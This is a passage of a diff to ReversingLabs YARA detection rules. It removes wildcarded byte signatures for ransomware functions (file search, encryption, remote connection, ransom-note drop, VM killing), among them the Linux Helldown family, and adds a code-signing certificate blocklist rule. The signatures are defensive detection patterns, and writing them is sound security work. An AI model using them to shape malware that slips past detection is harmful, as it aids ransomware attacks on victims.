-            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p3 = {
-            6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D
-            ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 50 8B 45 ?? 50 FF 15 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B
-            55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ??
-            8D 45 ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
-            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 6A ??
-            68 ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68
-        }
-		$encrypt_files_p4 = {
-            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 87 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 69 55 ?? ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ??
-            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B
-            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
-            ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 51 6A
-            ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ??
-            51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ??
-            51 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
-            ?? 69 45 ?? ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ??
-            50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p5 = {
-            E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 88 4D ?? 33 D2 89 55
-            ?? 89 55 ?? 89 55 ?? 89 55 ?? 88 55 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 33 C9 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50
-            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
-            ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 45 ?? 50 8D 4D ??
-            51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
-            75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ??
-            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8B 4D
-            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B
-        }
-		$encrypt_files_p6 = {
-            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ??
-            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D
-            ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ??
-            ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 45
-            ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 95 ?? ??
-            ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 55 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
-            ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ??
-            89 45 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? E8
-            ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? EB ?? 8B 4D ?? 8B 51 ??
-            89 55 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? C7 45 ?? ?? ?? ??
-            ?? 8B 4D ?? 8B 51 ?? 89 55 ?? EB ?? 8B 45 ?? 8B 48 ?? 89 4D ?? 83 7D ?? ?? 0F 84 ??
-            ?? ?? ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ??
-            ?? ?? ?? 6B D1 ?? 8D 8C 15 ?? ?? ?? ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 83 C8 ?? E9 ?? ??
-            ?? ?? 8D 55 ?? 89 55 ?? 8D 45 ?? 50 8B 4D ?? 0F B6 51 ?? 52 E8
-        }
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
-            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
-            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
-            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
-            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
-            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
-            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
-        }
-		$find_files_p2 = {
-            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
-            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
-            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
-            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
-            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment" and pe.signatures [ i ] . serial == "61:00:39:d6:34:9e:e5:31:e4:ca:a3:a6:5d:10:0c:7d" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Helldown : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Helldown ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aca11cf1-2d73-5599-8027-a52b9dcd4757"
-		date = "2025-01-20"
-		modified = "2025-01-20"
+		id = "5c1f82a4-c64d-556c-8c7a-213582e7bd5a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.Helldown.yara#L1-L127"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16266-L16282"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b5572f537c87d113886d79768cfe89e46c00063333de612a4547c9a80f5826e1"
+		logic_hash = "ab71e485c0b541fae79d246d34b1f4fb146747c1c3fb723aa87a7a32378ff974"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Helldown"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            41 56 41 55 41 54 49 89 FC 55 53 0F 1F 44 00 ?? 49 8B 74 24 ?? 49 8B 3C 24 E8 ?? ??
-            ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8B 38 E8 ?? ?? ?? ?? 48 85 C0 48 89 C3
-            0F 84 ?? ?? ?? ?? 66 90 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 84 ?? ?? ?? ??
-            0F B6 40 ?? 3C ?? 0F 84 ?? ?? ?? ?? 3C ?? 75 ?? 49 83 C6 ?? 4C 89 F7 E8 ?? ?? ?? ??
-            85 C0 74 ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ?? ?? ?? ?? 49 8D 7C 05
-            ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
-            ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ??
-            4C 89 EF 49 89 C6 E8 ?? ?? ?? ?? 49 8B 54 24 ?? 49 8B 7C 24 ?? 48 89 C6 4C 89 70 ??
-            E8 ?? ?? ?? ?? 49 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 0F 84 ?? ?? ?? ?? 4C 89 EF E8
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 85 ?? ?? ?? ?? 0F 1F 40 ??
-            48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 41 80 7E ??
-            ?? 0F 84 ?? ?? ?? ?? 48 8B 7D ?? 49 83 C6 ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ??
-            ?? ?? ?? 49 8D 7C 05 ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ??
-            4C 89 EF E8 ?? ?? ?? ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            89 EF E8 ?? ?? ?? ?? 4D 85 ED 49 89 C6 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 8B 54 24 ??
-            49 8B 3C 24 4C 89 F6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 5B 5D 41 5C 41 5D 41 5E
-            C3
-        }
-		$encrypt_files_p1 = {
-            41 57 48 89 F8 41 56 41 55 41 54 55 53 48 83 EC ?? 48 89 7C 24 ?? 66 2E 0F 1F 84 00
-            ?? ?? 00 00 48 8B 78 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 72 ?? 48 8B 7A ?? E8 ??
-            ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 30 4C 8B 68 ?? 48 85 F6 0F
-            84 ?? ?? ?? ?? 48 89 F7 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
-            89 44 24 ?? 48 89 C7 31 C0 E8 ?? ?? ?? ?? 85 C0 89 C3 0F 88 ?? ?? ?? ?? 49 81 FD ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 41 BF ?? ?? ?? ?? 44 0F 4C F8 BA ?? ?? ?? ?? 49 8D 85 ?? ??
-            ?? ?? BD ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 4C EA B2 ?? 44 0F 4C E2
-            48 3D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 0F 46 EA 44 0F 46 FA 44 0F 46 E0
-            BA ?? ?? ?? ?? 49 81 FD ?? ?? ?? ?? B8 ?? ?? ?? ?? 45 0F 4E E5 48 0F 4E EA 44 0F 4E
-            F8 E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 45 89 E4 48 89 C7 BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 4C 89
-        }
-		$encrypt_files_p2 = {
-            EA 49 89 C4 4C 89 E8 48 C1 FA ?? 45 31 ED 48 F7 FD 31 ED 48 89 44 24 ?? 0F 1F 40 ??
-            31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 E6 89 DF 41 83 C5 ?? E8 ??
-            ?? ?? ?? 48 8B 7C 24 ?? 48 8D 54 24 ?? 31 C9 41 89 C1 4D 89 E0 BE ?? ?? ?? ?? 41 89
-            C6 E8 ?? ?? ?? ?? 31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 44 89 F2 4C 89 E6 89 DF E8 ??
-            ?? ?? ?? 48 03 6C 24 ?? 45 39 EF 7F ?? 31 F6 BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48
-            8B 74 24 ?? BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 8B 7C 24 ??
-            E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 E4 74 ??
-            4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B
-            7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 30 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
-            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 8B 54 24
-            ?? 48 8B 32 EB ?? 66 0F 1F 44 00 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F
-        }
-		$drop_ransom_note = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 49 89 FC 48 83 EC ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 00 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? BE ?? ?? ??
-            ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 89 C7 48 8B 15 ?? ?? ?? ?? 48 89 C3 31 C0 E8
-            ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 89 DF 48 89 C5 E8 ?? ?? ?? ?? 4C 8D 6C 05 ??
-            31 ED 4D 85 ED 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 4C 89 EA 31 F6 48 89 C7 48 89 C5 E8 ??
-            ?? ?? ?? 4C 89 E6 48 89 EF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
-            89 DE 48 89 EF C6 40 ?? ?? E8 ?? ?? ?? ?? 31 F6 48 89 EF E8 ?? ?? ?? ?? 85 C0 75 ??
-            48 85 ED 74 ?? 48 89 EF E8 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 89 DF 48 8B 6C
-            24 ?? 48 8B 5C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? E9 ?? ?? ?? ?? 66 0F
-            1F 44 00 ?? 48 89 EF BA ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 3D ??
-            ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 31 C0 31 C9 BA ?? ?? ?? ?? 41 89 C4 48 89 FE E8 ?? ??
-            ?? ?? 48 8B 40 ?? 4C 8B 68 ?? 4C 89 EF E8 ?? ?? ?? ?? 44 89 E7 48 89 C2 4C 89 EE E8
-            ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 48 8B 5C 24
-            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? C3
-        }
-		$kill_virtual_machines_p1 = {
-            41 57 31 C0 B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 89 FD 53 48 81 EC ?? ?? ?? ?? 48 89
-            E7 48 89 E3 F3 48 AB C6 07 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 F6 48
-            89 C7 49 89 C4 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 C1 BE ?? ?? ?? ?? 49 89 C5 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 41 BF ?? ?? ??
-            ?? EB ?? 90 83 FD ?? 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? 4C 89 F6 48 89 DF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 8D 7D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0
-            0F 84 ?? ?? ?? ?? 4C 8D 70 ?? BE ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 89 DF C6 00
-            ?? 49 89 C5 4C 89 F9 31 C0 83 FD ?? F3 48 AB 48 8B 05 ?? ?? ?? ?? 48 89 03 48 8B 05
-            ?? ?? ?? ?? 48 89 43 ?? 48 8B 05 ?? ?? ?? ?? 48 89 43 ?? 8B 05 ?? ?? ?? ?? 89 43
-        }
-		$kill_virtual_machines_p2 = {
-            0F B7 05 ?? ?? ?? ?? 66 89 43 ?? 0F B6 05 ?? ?? ?? ?? 88 43 ?? 0F 85 ?? ?? ?? ?? 48
-            89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1
-            EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ??
-            ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ??
-            ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48
-            8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ?? ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ??
